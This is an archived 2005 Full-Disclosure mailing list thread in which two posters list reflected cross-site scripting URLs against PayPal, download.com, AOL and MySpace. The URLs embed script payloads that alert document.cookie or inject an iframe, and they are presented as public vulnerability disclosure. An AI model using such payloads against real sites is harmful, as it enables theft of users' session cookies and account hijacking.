| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY10-DAV3F0670BF83F9415D72706D92C0@phx.gbl>
Date: Thu Apr 21 07:52:19 2005
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: Big Sites That Are Vulnerable To XSS
toss this one in...
http://www.myspace.com/index.cfm?fuseaction=find&circuitaction=search&searchType=network&interesttype=&f_first_name=<iframe
src="http://whatismyip.com"></iframe>&Submit=Find
i think redirects are more effective in showing xss, but cookies are nice
too
or other xss like <SCRIPT>alert(document.cookie);</SCRIPT>
wood
----- Original Message -----
From: <tuytumadre@....net>
To: <full-disclosure@...ts.grok.org.uk>
Sent: Wednesday, April 20, 2005 9:19 PM
Subject: [Full-disclosure] Big Sites That Are Vulnerable To XSS
> The following have been previously reposibly disclosed, and, because of
the lack of action taken on the venders' parts, full disclosure is necessary
to elliminate the threat of what's called "security by obscurity."
>
> paypal.com
>
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--
>
> download.com
>
http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--
>
> aol.com*
>
https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D
>
> *on aol.com, the victim must be logged in to the website screenname
service to be vulnerable.
>
> Regards,
> Paul
> Greyhats Security
> http://greyhatsecurity.org
Powered by blists - more mailing lists